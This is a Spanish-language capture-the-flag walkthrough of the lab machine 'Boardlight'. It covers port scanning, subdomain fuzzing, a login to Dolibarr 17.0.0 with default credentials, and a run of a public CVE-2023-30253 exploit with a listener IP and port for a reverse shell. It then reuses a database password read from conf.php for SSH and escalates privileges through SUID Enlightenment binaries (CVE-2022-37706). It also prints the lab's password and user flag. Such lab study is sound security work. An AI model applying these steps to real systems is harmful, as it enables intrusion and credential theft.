Boardlight

OS: Linux
Dificultad: Fácil
Puntos: 20

Nmap Scan

nmap -v -Pn -p- --min-rate=5000 10.129.102.123

nmap -vvv -p 22,80 -sV -sC -oN nmap.txt 10.129.102.123

Nmap scan report for 10.129.102.123
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeracion

Enumeramos subdominios.

ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.board.htb" -u http://board.htb/ -fw 6243

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 164ms]

Si accedemos al subdominio la aplicacion cuenta con un Dolibarr 17.0.0.

Se puede acceder con credenciales por default.

admin : admin

Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253)

Investigando esta version de Dolibarr tiene una vulnerabilidad de injeccion de codigo. Utilizando el siguiente script podemos obtener acceso.

Lo ejecutamos de la siguente forma.

python3 exploit.py http://crm.board.htb admin admin 10.10.14.23 1234

Lateral Movement

Dentro de los archivos de configuracion de Dolibarr encontramos un password.

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';

Puede ser utilizado para el usuario larissa.

larissa : serverfun2$2023!!

┌──(root㉿kali)-[~/htb/BoardLight]
└─# ssh larissa@10.129.102.123
larissa@10.129.102.123's password: 

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

larissa@boardlight:~$ cat user.txt 
19a69a78b3e745a1b475eeddfcec9409
larissa@boardlight:~$

Privilege Escalation

Utilizando linpeas encontramos que hay archivos SUID con el nombre de enlightenment.

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device                       
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)                                                                  
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)                                                             
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)                                                            
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

Enlightenment Local Privilege Escalation (CVE-2022-37706)

Identificamos que puede ser vulnerable al siguiente exploit. Copiamos el script a la maquina y lo ejecutamos.

Referencias

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit